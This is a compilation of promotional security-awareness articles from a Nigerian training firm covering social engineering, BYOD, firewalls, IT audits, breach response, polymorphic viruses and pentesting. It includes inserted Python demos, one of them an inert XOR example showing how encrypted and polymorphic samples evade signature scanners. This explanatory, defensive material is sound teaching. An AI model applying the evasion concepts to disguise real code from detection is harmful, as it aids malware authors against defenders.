Social engineering is a technique whereby cybercriminals make use of human interactions to trick users into giving out sensitive information such as personal credentials.
Types of Social Engineering
Because social engineering leverages human nature and emotions, attackers have deployed many techniques to trick users both online and offline. Here are a few techniques you should know about:
Phishing is one of the oldest cyber tricks and has grown to be one of the most popular and most successful means of exploiting computer users. In phishing, cybercriminals attempt many tricks and methods to get information from you. Recently, they have resorted to scare tactics, which can come in the form of an urgent situation that requires your attention, usually having to do with your banking details or your other online accounts. Users are therefore pushed to make decisions based on fear and on how they feel at the time the scenario is simulated.
Emails that seem to be from a legitimate authority, such as your financial institution or your company, will be sent to you requesting your username or password in order to get login access. People tend to react when issues involving their finances or jobs are involved, especially when the message appears to come from higher management. I will reiterate that one major phishing tactic is the sense of urgency applied to these messages. I have written comprehensively on the forms and techniques of phishing, so you can look it up.
Now let's look at a technique which involves cybercriminals leaving a malware-infected USB drive or other external device in a public or open place. They leverage the curious nature of humans: someone picks up the device out of curiosity and plugs it into their computer to see what information is on it. Once they do this, the malware automatically gets injected into their computer.
In pretexting, the cybercriminal fabricates very emotional stories and scenarios that tend to get to the emotions of their victims. Sometimes the stories are about being stranded in a foreign country, and sometimes the scammers claim to be princes or princesses in their countries whose father has just passed away. They then ask the victim to please help them with a sum of 500USD or more in order to take back the throne. Like I said, this type of scenario tends to get to the emotions of victims, who may always want to help. Pretexting is used alongside other methods, as most of the techniques are aimed at getting to the emotions of the victim, or the cybercriminal attempts to impersonate someone on the telephone.
Hacking Emails and Spamming of Contacts
It is in human nature to be inclined towards the affairs of family and of people we seem to know. For example, if my brother sends me an email with a subject that says "Look up this website, you may find something of interest", I normally wouldn't resist checking it out by clicking it open. This is the reason why a cybercriminal will try to leverage this technique using email addresses and passwords. As soon as the victim's personal credentials are obtained by the cybercriminal, they take total control of the user's account and go on to spam all the contacts on the user's list. Always remember that the main objective of this attack vector is to spread malware with the aim of tricking people into giving out their personal data.
Of all the methods mentioned so far and beyond, this technique involves the most human interaction. In vishing, the cybercriminal puts a call through to an employee of an organisation, pretending to be an individual trusted by the organisation. They can pose as a representative of a bank or of another high-profile company related to the victim's organisation, proposing to do business with them.
Their aim is to try to get as much information as possible from the victims. They can even pose as a fellow employee with a lost or misplaced password and ask for the victim's password, and may try to sound legitimate by asking questions to verify the identity of the victim.
Quid Pro Quo
This is also referred to as something-for-something. This technique involves attempting to entice users with prizes, products or discounts on the purchase of expensive products. The scam is fashioned such that users can only get something after they have completed a form which mostly requires personal data. The information gathered can then be used to perpetrate other attacks such as identity theft.
This technique is largely related to phishing and can be referred to as phishing's complex cousin. In spear phishing, the cybercriminal targets the employees of an organisation and does some reconnaissance on them online with the aim of getting personal information.
Information can be gathered from internet searches and from profiles on social media platforms. Once the attackers have details personal to their targets, they can start sending emails that seem necessary and of interest to them in order to entice them, so that once the targets click the links sent to them, the attached malware file is downloaded to their system. Once the cybercriminal successfully tricks the user, the malware is installed on the user's computer and can spread to other computers on the company network.
This is more like a long con, where the cybercriminal tries to establish a relationship with a target. They usually go through their target's social media profiles in order to establish a relationship and gather as much information as possible to help them perform an attack.
This attack form typically depends on pretexting, because the attacker's aim is to have prolonged conversations with the target in order to extract as much information as possible.
This is a shorter version of all the attack forms. The cybercriminal will typically use baiting, phishing and email hacking to extract information from a chosen target passively (i.e. with no direct contact or with as little interaction as possible).
Social engineering has taken on all forms, both online and offline, and it has therefore become very difficult to control or cut off its threats. Your best defense mechanism against social engineering is to educate yourself, and your employees if you run an IT-driven organisation. You should also stay aware and look out for any possible attack methods that may come.
We have a comprehensive course that can help you learn more on how to protect yourself from social engineering and other attack forms. Subscribe to our CEH course today in SOUTECH.
In a recent survey, Symantec said that about three to four small and medium-sized organization owners have adopted smartphones and tablets as a core part of achieving their teams' success. Since the use of these devices is gradually expanding, there is a need to provide apt security for them. This is the main reason why organizations have adopted the bring-your-own-device concept, an approach that is commonly referred to as BYOD.
The fact that smartphones and tablets have grown into consumer markets has made a lot of employees choose to bring the Bring-Your-Own-Device concept to their places of work. So, I'll be giving you a few tips on how to stay protected on the internet, as mobile devices have become a core entity in many organizations.
Hence the idea of developing a sound and efficient BYOD policy that can help you gain maximum productivity in your organization or company.
These are a few things I will buttress on this point, which are necessities for every organization:
1. Assessing the needs of Your BYOD
One of the key things you can do is to brief or engage your employees and staff in talks regarding the use of their devices in the organization for business transactions. The things you need to find out are;
- Do they access the company server and read emails related to work or the business?
- What operating systems and devices do employees use to access the network?
This information will guide your policies and help you to define their scope and the measures you can take to secure your devices. It can also help you in choosing the security software you can deploy to protect those devices.
2. Always Educate Your Employees
Endeavour to talk to your employees and team members about the potential risks of using mobile devices in and out of the office, including the importance of managing any related risk. It must be made compulsory for employees to follow security best practices, which include:
- Using complex passwords for their devices and for any work-related program accessed using those devices.
These passwords can be set by navigating through the device's settings. Learn more about creating strong passwords.
- Employing a regular password changing policy, for example changing passwords quarterly or every 90 days. You can use password manager services like KeePass or LastPass, which can help employees manage multiple and regular password changes.
- Always ensuring that system updates and app updates are done once the device prompts for them. This is done in order to protect against any possible security vulnerabilities.
- Being on the lookout for phishing text messages and emails, which can be avoided by not clicking on links that prompt them to download files and documents from unknown pages.
- Doing thorough research on applications before downloading them onto devices. Employees should be discouraged from downloading applications from unofficial or third-party app stores.
3. Strong Protective measures must be implemented
Products that will help employees strengthen the security of their devices when used for business should be explored. A very good tool is the Norton Small Business software, which protects mobile devices against mobile malware. Research has shown that many devices running on Android platforms carry potential malware, privacy loopholes and greyware which are capable of hindering productivity. However, there are new products that provide more security, including remote locate, lock and wipe features. These features allow mobile users to manage their device security from a central web portal. Consider using a VPN (Virtual Private Network) service if employees access the company's network remotely with their mobile devices. A VPN creates an encrypted tunnel over the internet which allows traffic to pass through it. There are mobile apps that allow users to connect to a VPN via their mobile devices or smartphones.
4. Acceptable Use should be properly defined
Guidelines should be outlined to clarify and define how employees can use their devices during business hours for business purposes. For instance, you may employ a pervasive policy by allowing your team members to access documents and emails, but prohibiting them from having access to sensitive files such as financial data. Websites and apps that must not be accessed over the company VPN during work hours should be specified.
5. Decide how these Guidelines are Enforced
Set up due consequences for any member of your team who goes against any of the outlined policies. For example, accessing prohibited apps or software during business hours could result in a warning, and anyone who downloads or stores confidential files from a malicious app will not get funding for their mobile devices.
These measures should be outlined clearly with how any potential violations will be handled.
If you run a business or an organisation that encourages a BYOD policy, thinking through these steps and tips should guide you in building a firm foundation and an effective way to manage your infrastructure and protect it from any possible security breaches.
You can learn a lot more tips on how to better manage your infrastructure, along with proper auditing skills, from SOUTECH ventures. We offer the best IT consulting solutions to our clients in Abuja, Lagos and Port Harcourt. Subscribe to our Ethical hacking course and learn more.
Protect your Infrastructure-Know the Importance of Firewalls : SOUTECH Cyber security training program Nigeria, Africa
Esang U. E
A firewall, just as its name implies, is a protective barrier whose function is much like that of a physical firewall. The firewall sits between the computer and its connection to the internet to provide protection from any form of online threat.
A firewall is a software program or a hardware device that is programmed to provide security for your computer by placing limitations on the information that you can receive from an external network. A firewall is designed to either allow or block information coming in or out of a network based on certain security policies.
The term firewall came into the cybersecurity world as a term borrowed from firefighting, where an effort is made to prevent the spread of fire.
Organizations started moving away from the use of mainframe computers and dumb clients to a client-server model, and therefore the need to put a control over the server became a top priority. Before the introduction of firewalls in the late 80's, the only form of protection from the outside world was the use of Access Control Lists (ACLs) resident in routers. The function of the ACLs was to choose which IP addresses to grant or deny access to a certain network.
Due to the swift growth of the internet and the increased rate at which people and organizations connected to networks, the ACL gradually came to an end as a filtering method, since it was not enough to keep out malicious traffic. This was so because only basic information about network traffic was embedded in the packet header. The first organization to deploy firewalls to tackle the threat of cyberattacks was the Digital Equipment Corp (DEC) in 1992.
Types of Firewall Techniques
- Packet Filter Firewalls: This type of firewall handles the packets going in or out of the network based on rules pre-defined by the user. Packet filtering is fairly transparent to users and effective, but it can be difficult to configure. It is also very susceptible to IP spoofing.
- Application gateway Firewalls: This type of firewall applies security configurations to specific applications like Telnet and FTP servers. The application gateway firewall is very effective but can impose some performance degradation.
- Circuit-level Gateway firewalls: This firewall type applies its security configurations when a TCP or UDP connection is established. Once this connection is established, the packets flow between the hosts without any further verification.
- Proxy Server Firewalls: This firewall type intercepts all the messages that go in and out of the network. The proxy server firewall cascades or hides the real network address of the host.
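To make the packet-filter item above concrete, here is an added example (not from the original article) of a first-match, default-deny packet filter that decides on header fields only, which is why a forged source address passes it. The example goes one step beyond the text by adding an ingress anti-spoofing check, a standard mitigation; the rules, addresses and interface names are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    iface: str   # interface the packet arrived on: "wan" or "lan"
    src: str     # source IP as written in the header (can be forged)
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    src: str               # source network in CIDR notation
    dst: str               # destination network in CIDR notation
    proto: str             # "tcp", "udp" or "any"
    dport: Optional[int]   # None matches any port

    def matches(self, p):
        return (ipaddress.ip_address(p.src) in ipaddress.ip_network(self.src)
                and ipaddress.ip_address(p.dst) in ipaddress.ip_network(self.dst)
                and self.proto in ("any", p.proto)
                and self.dport in (None, p.dport))


# Constructed rule set: admins on the LAN may SSH to one server, anyone may
# reach the web server over HTTPS, everything else is dropped.
RULES = [
    Rule("allow", "192.168.10.0/24", "10.0.0.5/32", "tcp", 22),
    Rule("allow", "0.0.0.0/0", "10.0.0.80/32", "tcp", 443),
    Rule("deny", "0.0.0.0/0", "0.0.0.0/0", "any", None),
]

# Networks that only ever exist behind the firewall (constructed).
INTERNAL_NETS = [ipaddress.ip_network("192.168.10.0/24"),
                 ipaddress.ip_network("10.0.0.0/24")]


def filter_packet(rules, p):
    """Plain packet filter: the first matching rule wins, default deny."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return "deny"


def filter_with_ingress_check(rules, p):
    """Same filter, but first drop packets that arrive from outside while
    claiming an internal source address."""
    src = ipaddress.ip_address(p.src)
    if p.iface == "wan" and any(src in net for net in INTERNAL_NETS):
        return "deny"
    return filter_packet(rules, p)


# Constructed sample packets.
ADMIN = Packet("lan", "192.168.10.7", "10.0.0.5", "tcp", 22)
OUTSIDER = Packet("wan", "203.0.113.50", "10.0.0.5", "tcp", 22)
SPOOFED = Packet("wan", "192.168.10.7", "10.0.0.5", "tcp", 22)
WEB = Packet("wan", "203.0.113.50", "10.0.0.80", "tcp", 443)

if __name__ == "__main__":
    for name, pkt in [("admin", ADMIN), ("outsider", OUTSIDER),
                      ("spoofed", SPOOFED), ("web", WEB)]:
        print(f"{name:9s} plain={filter_packet(RULES, pkt):5s} "
              f"ingress-checked={filter_with_ingress_check(RULES, pkt)}")
```

The spoofed packet is allowed by the plain filter and dropped once the arrival interface is taken into account.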
The benefits of a firewall
- It prevents any unauthorized user on an external network from gaining access to your internal network, i.e. the computers in your network.
- It monitors all forms of communication that go on between your computer and other computers outside your network and over the internet.
- It establishes a protective shield that either allows or blocks any attempt to access data or information on your computer.
- It sends out a warning when any other computer tries to connect to you.
- It also warns against any illegitimate connection by an application on your computer that gives access to other computers.
The Limitations of a Firewall
Firewalls, however, are not able to determine the contents of email messages that are sent to your computer, so they cannot protect you from malware sent through phishing emails.
- The need for antivirus softwares that can detect, quarantine or delete suspicious email attachments
- Learn to protect yourself from phishing scams
If you have a private network, be sure to protect your devices by configuring the firewall settings on your computers and wireless router. You can also add an extra level of security to your personal computers by using security software. However, even if your wireless network seems secure, it may not be secure from other types of malware that can be picked up from other computers through the internet.
Build your firewall such that it can defend you against hackers and viruses. You can do this by always ensuring that your firewall is turned on. You can configure the firewall settings in the security and privacy section, which can be found under your system preferences.
Also be sure to update your anti-virus software regularly as an extra security measure. Please note that firewalls and anti-virus programs are not the same thing.
Finally, aside from the protection a firewall offers you, learn safe online practices.
If you need to learn about firewall configurations, or to purchase the latest licensed anti-virus software, contact us at soutech ventures. Subscribe to us today for all types of IT trainings and consultations you may require.
An IT audit is an audit that deals with the review and evaluation of all automated and non-automated information processing systems and all the interfaces that it encompasses. It also includes setting up management controls for information technology and infrastructures.
The elementary function of an IT audit is the evaluation of the systems that are already in place to guard the organization’s information. It looks into the ability of an organization to protect its assets as well as to legitimately and adequately give out information to authorized parties.
The process of planning IT audits involves two key steps
- Gathering information and planning
- Gaining an understanding of the already existing internal control structures
Many organizations are gradually moving towards a risk-based audit approach, which is used for risk assessment and helps the IT auditor decide whether to carry out compliance or substantive testing. The risk-based approach involves the IT auditor relying on the internal and operational controls and also on knowledge of the organization involved.
These are the 5 aspects that an IT auditor needs to identify when gathering information:
- Good knowledge of the business and industry
- Previous results obtained from all the years
- Recent financial data
- Already existing standards and policies
- Inherent risk assessments
Inherent risk here refers to the risk that an error exists, possibly as a combination of errors encountered during the audit, assuming there are no controls in place.
Once the auditor has gathered relevant information and has an understanding of the control, then they are ready to start planning or select areas that need auditing.
Why is it important to do an IT Audit?
Hardly will you find an organization in recent times that is not IT driven. Many organisations today are investing huge amounts of cash in their IT infrastructure because they have come to realize the tremendous importance of IT in their business services and operations. As a result, they need to make sure that their IT systems are secure, reliable and not susceptible or vulnerable to any form of cyber attack.
The importance of an IT audit can never be overemphasized, because it provides assurance that the IT systems deployed by the organization are well protected, available at all times, properly managed to get the required results, and give out reliable information to users. Many people use and rely on IT without knowing how it works, or that a computer can repeat an error many times over and cause more extensive damage than a human being can. An IT audit is also very important in reducing the risk of data leakage, data loss, service disruption and mismanagement of IT infrastructure.
The Objectives of an IT audit
The objectives of an IT audit often focus on substantiating that the existing internal controls are functioning as expected in order to minimize business risk. The objectives include:
- Assuring compliance with legal and regulatory standards
- Ensuring confidentiality
- Ensuring Integrity
- Improving availability of information systems
Confidentiality here relates to information security and refers to protecting information from being disclosed to unauthorized persons or parties. This means that information such as personal credentials, trade secrets, bank account statements are kept confidential and protecting this information plays a major role in information security.
Information is valuable only when it has not been tampered with, which is where data integrity comes in: information must not be modified by an unauthorized party. If information is inappropriately altered, it could prove costly; for example, a transaction of 1000 naira can be altered to 10,000 naira. Making sure data is protected from being tampered with is a core aspect of information security.
Availability here means that information is made available to authorized individuals whenever it is needed. Unfortunately, the act of denying rightful users access to resources has been on the rise lately. An information systems audit will therefore ensure the confidentiality of an organization’s data, data integrity and availability of resources. An IT audit therefore oversees the organization’s IT systems, its operations and management processes.
The reliability of data from an IT system can also have a huge impact on the financial statements of an organization. Therefore an IT audit must be able to:
- Check for instances of excesses, gross inefficiencies, extravagance which has to do with wastage of resources in the management of IT systems
- Ensure that there is a high level of compliance with government laws as applicable to the IT system.
Types of IT audits
Different bodies and authorities have developed their views to distinguish the types of IT audits. Goodman and Lawless have outlined three systematic approaches to perform IT audits
- Technological Innovation Process Audit: This audit type attempts to construct a risk profile for already existing as well as new projects. It assesses the length, depth and presence of the technologies used by the company and how it relates to the relevant markets. It also looks into the way each project is organized, the structure of industry as regards its projects, products etc.
- Technological position audit: This audit type deals with the technologies that the business has on ground and what it needs to add to it. Technologies can be categorized into
- Innovative Comparison Audit: This audit deals with the analysis of the innovative capabilities of the organization being audited when compared to its competitors and rivals. The company’s research and development facilities as well as its track record of producing new products will be examined.
Other authorities have also categorized IT audits into a spectrum of 5:
- Information Processing Facilities: It is focused on verifying the processing ability of the facility and whether it is designed to process applications in a timely, accurate and efficient way under normal and disruptive conditions.
- Systems and Applications: It is focused on verifying that systems activity is controlled appropriately, efficiently and adequately in order to ensure that output at all levels is valid, reliable and timely. This audit type forms a sub-type that focuses on business IT systems and also focuses on financial auditors.
- Management of IT and Enterprise Architecture: It focuses on verifying that IT management has developed an organizational structure and procedures that ensure a controlled and efficient information processing environment.
- Systems Development: This audit verifies that the systems under development meet the requirements and objectives of the organization. It also ensures that the systems are developed in line with generally accepted policies and standards for systems development.
- Client/Server, Intranets, Extranets and Telecommunications: This audit verifies that the controls for telecommunications are in place at both the client and the server ends, as well as on the network that connects the clients and servers.
Types of Auditors
- Internal Auditor: This auditor usually performs internal accounts auditing as well as IS audits.
- External Auditor: This auditor reviews the findings and inputs, processes and outputs of the information systems made by the internal auditor.
Types of Audits
- Internal Audits: As explained above, an internal audit considers all the potential controls and hazards in an information system. It takes care of issues like operations, data, data integrity, security, privacy, software applications, productivity, expenditures, cost control and budgets. The auditor works with guidelines, such as those of the Information Systems Audit and Control Association, which are available to give the job a pattern.
- External Audits: This audit builds on information obtained from internal audits of information systems. An external audit is performed by a certified information systems audit expert.
IT Audit Strategies
- We’ll discuss two areas here, but first one must be able to determine whether it is compliance or substantive testing. The next thing to consider is how to go about gathering evidence to enable one to perform application audits and make reports to the management.
What is substantive and Compliance Testing?
- Compliance testing involves gathering evidence to test whether an organization is following its control procedures. For example, if an organization has a control procedure stating that all application changes have to pass through change control, an IT auditor will obtain the current running configuration of the router as well as the configuration file. The auditor can then run a file comparison to find the differences and use the result to look for supporting change control documentation.
- Substantive testing involves gathering evidence that enables one to evaluate the integrity of individual data and other information. For example, if an organization has a policy on backup tapes kept at offsite storage locations that includes three generations (grandfather, father and son), then the IS auditor has to take a physical inventory of the tapes at the offsite storage location. The auditor can then compare it with the organization’s inventory, making sure that all three generations are present and available at the time of the audit.
- The next thing to discuss is how to get the evidence that can help you audit the application and deliver a report to management. A few things you can review are:
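The two tests described above, worked through in Python as an added example that is not part of the original article. The router configurations, ticket IDs, tape labels and all function names are constructed for illustration.

```python
import difflib

# Constructed sample data (not from a real device): the configuration file held
# under change control, and the configuration currently running on the router.
APPROVED_CONFIG = """\
hostname edge-rtr-01
interface Gi0/0
 ip address 192.0.2.1 255.255.255.0
access-list 101 permit tcp any host 192.0.2.10 eq 443
access-list 101 deny ip any any
snmp-server community ops-ro RO
"""
RUNNING_CONFIG = """\
hostname edge-rtr-01
!
interface Gi0/0
 ip address 192.0.2.1 255.255.255.0
access-list 101 permit tcp any host 192.0.2.10 eq 443
access-list 101 permit tcp any host 192.0.2.10 eq 22
access-list 101 deny ip any any
snmp-server community public RW
"""
# Constructed change-control register: ticket id -> configuration lines it approved.
CHANGE_RECORDS = {
    "CHG-0001": ["access-list 101 permit tcp any host 192.0.2.10 eq 22"],
}

# Constructed tape data: the organization's offsite register (tape id -> generation)
# and the tape ids the auditor physically counted at the offsite location.
TAPE_REGISTER = {
    "GF-2024-01": "grandfather",
    "F-2024-W07": "father",
    "S-2024-02-14": "son",
}
TAPES_COUNTED = {"GF-2024-01", "S-2024-02-14", "S-2024-02-13"}


def normalize(config_text):
    """Drop blank lines, '!' separator lines and trailing spaces (cosmetic noise)."""
    lines = []
    for line in config_text.splitlines():
        line = line.rstrip()
        if line and not line.lstrip().startswith("!"):
            lines.append(line)
    return lines


def config_differences(approved, running):
    """Return (added, removed) lines of the running config relative to the file."""
    old, new = normalize(approved), normalize(running)
    added, removed = [], []
    matcher = difflib.SequenceMatcher(a=old, b=new, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("replace", "delete"):
            removed.extend(old[i1:i2])
        if tag in ("replace", "insert"):
            added.extend(new[j1:j2])
    return added, removed


def compliance_test(approved, running, change_records):
    """Every difference needs a supporting change record; the rest are exceptions."""
    documented = {}
    for ticket, lines in change_records.items():
        for line in lines:
            documented[line.strip()] = ticket
    added, removed = config_differences(approved, running)
    findings = []
    for kind, lines in (("added", added), ("removed", removed)):
        for line in lines:
            ticket = documented.get(line.strip())
            findings.append({
                "change": kind,
                "line": line.strip(),
                "ticket": ticket,
                "result": "supported" if ticket else "exception",
            })
    return findings


def substantive_test(register, counted):
    """Reconcile the physical tape count with the register and the three generations."""
    on_shelf = {tape for tape in counted if tape in register}
    generations_present = {register[tape] for tape in on_shelf}
    return {
        "missing": sorted(set(register) - counted),      # on the books, not on the shelf
        "unrecorded": sorted(counted - set(register)),   # on the shelf, not on the books
        "absent_generations": sorted(
            {"grandfather", "father", "son"} - generations_present),
    }


if __name__ == "__main__":
    for finding in compliance_test(APPROVED_CONFIG, RUNNING_CONFIG, CHANGE_RECORDS):
        print(finding)
    print(substantive_test(TAPE_REGISTER, TAPES_COUNTED))
```

Each `exception` row is a difference with no change record behind it, which is what the auditor follows up on; a non-empty `absent_generations` means the three-generation policy was not met at the time of the count.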
- Review the IT organizational structure
- Review the IT policies and procedures
- Review the IT standards
- Review the IT documentations
- Review the organizations BIA
- Take time to interview employees
- Observe the employee’s performance
- Test controls and examine necessary incorporated entities
- Draft out a set of questionnaires
- Whether there is a thorough documentation of approved IS audit guideline?
- Whether IS audit guidelines are consistent with the security policy?
- Whether responsibilities for the IT audit has been assigned to a separate unit that is independent of the IT department?
- Whether periodic external IS audit is carried out?
- Whether independent security audit is conducted periodically?
- Whether contingency planning, insurance of assets, data integrity etc. are made part of External audit?
- Whether vulnerability and penetration testing were made part of external audit?
- Whether the major concerns brought out by previous Audit Reports have been highlighted and brought to the notice of the Top Management?
- Whether necessary corrective action has been taken to the satisfaction of the Management?
- Whether there are facilities for conducting training which will enable IS audit teams to conduct the audit process effectively?
- Whether IS audit team is encouraged to keep themselves updated?
- Whether IS auditors exchange their views and share their experiences internally?
Operations in modern organizations are increasingly dependent on IT, which is why IT audits are used to make sure that all information-related controls and methods are functioning properly. Most companies, if not all, are IT driven, and not enough awareness has been raised about auditing IT infrastructure, which is the reason for this write-up. If you’re in search of a professional firm to audit your organization, look no more: Soutech Web Consults, the number one IT consulting firm in Nigeria, offers this service. Subscribe to us for your auditing and all types of IT-related issues.
Just recently it was in the news that over 7 million Dropbox usernames and passwords had been stolen, with initial reports that the Dropbox server itself was hacked. The company made this statement on their blog: “The usernames and passwords that are referenced in these articles were stolen from unrelated services and not Dropbox. Attackers however, went further to use the stolen credentials to attempt to log in to our websites across the internet, including Dropbox”.
Stories of data and network breaches in organizational networks have been in the headlines recently, so regardless of where the loopholes are, it is something we hear about frequently. Many high-profile businesses that we interact with regularly, such as restaurants and product retailers, have had POS (Point of Sale) data breaches over the past months.
However, I will tell you a few tips on how to approach a data breach situation and some things you can put in place in case you’re faced by such situations.
What to do Immediately- First Things First
- First of all, try to determine the form of data breach that your information has been involved in. If it is an online data breach, then there is a possibility that your username and password have been stolen, and if it is a POS data breach then it means your credit card numbers have been stolen as well.
- If it is a POS data breach at a product outlet, a store or a restaurant where you have just purchased something, then immediately check your credit card and bank details for any suspicious activity.
- Look out for any alerts from the vendors that you use, so that as soon as a vulnerable vendor contacts customers about a password change, you do so too.
- Avoid any potential phishing emails, i.e. emails that require you to update your password and private information via email. One tip is to always check the email ID or web address to confirm it is the official email or web address of your financial institution.
- You should also change your other passwords if you use the same password across several accounts, particularly the ones linked to your email account and those that contain your private and financial information. I advise you to go through your bank and credit card accounts as well.
- Always notify your financial institution whenever you notice any suspicious activity on your financial account. Make sure you let them know the breached institution at which your credit card was used. They can take immediate action by blocking any transaction to that account.
Meanwhile in the Interim
- Continue to keep a close eye on your bank or financial accounts. You could also subscribe to transaction alerts via text and email. It is policy now for every bank to provide these services. Sometimes it may seem that you are now safe, but a cybercriminal has patience as a key virtue and may therefore take months to make use of your stolen bank and financial information.
- You might as well contact the company which the data breach occurred when you did your transaction. They can provide you with information as regards the type of information that was leaked and the policies they have put in place to keep your personal details protected.
In the Long run
- A lot of businesses or organisations have developed a policy such that any customer affected by a data breach is given a free year of data monitoring. You can also find out from the organisation if they have such a policy or offer such services.
- I still lay emphasis on the use of a secure password coupled with a two-factor authentication as explained in my previous articles to be a key online safety means.
Data breaches continue to be among the most frequent incidents these days but, like I said, there are ways to stay alert and be protected at all times. Luckily, for purchases you have made, there are anti-fraud laws in place to ensure your safety. If you find yourself in the clutches of a data breach, be diligent enough to monitor your accounts. Soutech web consultants are just the right professionals to handle your fears. If you in any way become a victim, you can contact us at SOUTECH. Also, if you apply all the methods and tips mentioned in this article and report any suspicious or fraudulent activity, then you are as well informed as ever.
Polymorphic viruses have over the years been among the most difficult and complex viruses to detect. Anti-virus companies have had to spend days and months creating the detection routines required to catch a single polymorphic.
I’ll discuss polymorphics and some of the existing detection mechanisms, and also introduce Symantec’s Striker technology, a patent-pending mechanism for the detection of polymorphics.
Norton AntiVirus 2.0 was the maiden version to include Striker for possible detection of polymorphics.
The Evolution of Polymorphic viruses
A computer virus can be defined as a self-replicating computer program that functions without the permission of the user. In order to spread, it attaches a copy of itself to some part of the program such as a word processor or a spreadsheet. A virus can also attack boot records and master boot records that contain all the information that a computer needs to startup.
Some viruses only replicate themselves, some display messages put in by their creator, and some are designed to deliver a payload that corrupts programs, deletes files, reformats a hard disk drive, or shuts down or crashes a corporate network. I will quickly discuss some types of viruses before relating them to polymorphic viruses.
All a simple virus does is to replicate itself such that if a user launches the program, the virus gains control of the computer and attaches a copy of itself to other program files. After it spreads successfully, the virus transfers control back to the host program, which functions normally. You can perform a simple anti-virus scan to detect this kind of infections.
The encrypted virus was a response to signature-based scanning: its idea was to hide the fixed signature by scrambling the virus body, making it unrecognizable to the virus scanner.
An encrypted virus is made up of a virus decryption routine as well as an encrypted virus body such that if the user launches the infected program, the virus decryption routine first gains control of the computer, then decrypts the body of the virus.
The polymorphic virus is built with a scrambled virus body and a decryption routine that first gains control and then decrypts the virus’ body. However, it possesses a third component, a mutation engine, which generates randomized decryption routines that change each time the virus infects a new program.
The mutation engine and the virus body are both encrypted such that when a user runs a program infected with a polymorphic virus, the decryption routine first gains control of the computer, then decrypts both the virus body and the mutation engine.
The decryption routine then transfers control of the computer to the virus, which locates a new program to infect. At this point, the virus makes a copy of both itself and the mutation engine in random access memory (RAM). The next thing the virus does is that it invokes the mutation engine, which will randomly generate a new decryption routine that will decrypt the virus and yet does not bear any resemblance to the previous decryption routine. The virus encrypts the new copy of the virus’ body and the mutation engine. Finally, the virus then attaches this new decryption routine, alongside the newly encrypted virus and mutation engine to the new program.
So, we can see that not only is the virus’ body encrypted, but the decryption routine varies from infection to infection. This therefore confounds a virus scanner searching for the tell-tale sequence of bytes that identifies a specific decryption routine. With no fixed signature to scan for, and no fixed decryption routine either, no two infections look alike.
Detecting a Polymorphic Virus
Anti-virus researchers fought back by developing special detection routines crafted to catch each and every polymorphic virus. Special programs were written, line by line, to detect the various sequences of computer code known to be used by the mutation engines to decrypt the virus body.
This approach was not feasible; it was also time consuming and costly. Every new polymorphic virus needs its own detection program. Moreover, a mutation engine produces seemingly random programs, each of which can properly perform decryption, and some mutation engines generate billions of variations.
Moreover, a lot of polymorphics make use of the same mutation engine, thanks to virus authors such as Dark Avenger. In addition, different engines used by different polymorphics can generate similar decryption routines, which makes identifying a virus solely from its decryption routine wholly unreliable.
This approach can be misleading by identifying one polymorphic as another. These shortcomings led anti-virus researchers to develop generic decryption techniques that trick a polymorphic virus into decrypting and revealing itself.
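The progression from simple to encrypted to polymorphic, seen from the scanner's side, as an added Python example that is not from the original article. It assumes a single-byte XOR as the scrambling step (the article does not say which cipher is used) and uses inert constructed byte strings; the last step brute-forces the key as a simplified stand-in for exposing the decrypted body, and is neither Striker nor a generic decryption engine.

```python
# Constructed, inert byte strings. Nothing here is executable code: the "stubs"
# are text labels standing in for a decryption routine, the body is a marker.
BODY = b"constructed inert body | marker=AV-DEMO-SIGNATURE-0001 | end of body"
FIXED_STUB = b"stub-A: mov/xor/inc/loop"
VARIED_STUBS = [
    b"stub-B: push/pop/xor/dec/jnz",
    b"stub-C: lea/xor/add/cmp/jb",
    b"stub-D: sub/xor/ror/inc/jne",
]
KEYS = (0x21, 0x5A, 0xC3)  # a different scrambling key for each infection

# What a signature scanner ships: fixed byte sequences to search for.
SIGNATURES = {
    "body": b"AV-DEMO-SIGNATURE-0001",
    "decryptor": FIXED_STUB,
}


def xor_bytes(data, key):
    """Assumed scrambling step: XOR every byte with one key byte."""
    return bytes(b ^ key for b in data)


def build_sample(stub, key):
    """Lay a sample out as the article describes: decryption routine, then scrambled body."""
    return stub + xor_bytes(BODY, key)


SIMPLE = BODY                                                   # body in the clear
ENCRYPTED = [build_sample(FIXED_STUB, k) for k in KEYS]         # same stub every time
POLYMORPHIC = [build_sample(s, k) for s, k in zip(VARIED_STUBS, KEYS)]


def signature_scan(sample):
    """Return the names of all fixed signatures found in the sample."""
    return [name for name, sig in SIGNATURES.items() if sig in sample]


def recover_key(sample, signature):
    """Try all 256 keys; return the one under which the signature appears, else None."""
    for key in range(256):
        if signature in xor_bytes(sample, key):
            return key
    return None


def detection_matrix():
    """Signature-scan results per sample family."""
    return {
        "simple": [signature_scan(SIMPLE)],
        "encrypted": [signature_scan(s) for s in ENCRYPTED],
        "polymorphic": [signature_scan(s) for s in POLYMORPHIC],
    }


if __name__ == "__main__":
    for family, hits in detection_matrix().items():
        print(family, hits)
    # Once the body is exposed, the ordinary body signature matches again.
    print([recover_key(s, SIGNATURES["body"]) for s in POLYMORPHIC])
```

The body signature only matches the unscrambled sample, the decryptor signature only matches samples that reuse one routine, and the polymorphic samples match neither until the body is exposed.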
To gain more knowledge about all forms of malware, along with malware analysis skills, subscribe to our CEH course at Soutech Ventures. We have trained and seasoned experts to give you both theoretical and hands-on ethical hacking knowledge and skills.
In my previous articles, I have discussed vulnerability analysis and penetration testing extensively, but I’ll reiterate a few things to help buttress the points in this article.
Penetration testing plays a major role in the playbook of any security consultant, and a penetration test is the best clue to how vulnerable a network is to an attack. Compliance standards such as PCI and HIPAA require vulnerability assessment, and vulnerability assessments also enable penetration testing to be performed smartly and in a targeted form when compared to performing simple port scans. Most importantly, vulnerability assessment is the bedrock for developing an information security program that is proactive, going beyond reactive techniques such as starting firewalls, identifying loopholes and attempting to seal them. But know this: when installing and managing your websites and networks, even if you know much about the basic security measures and follow them, it is never enough to discover and mitigate all the vulnerabilities by yourself.
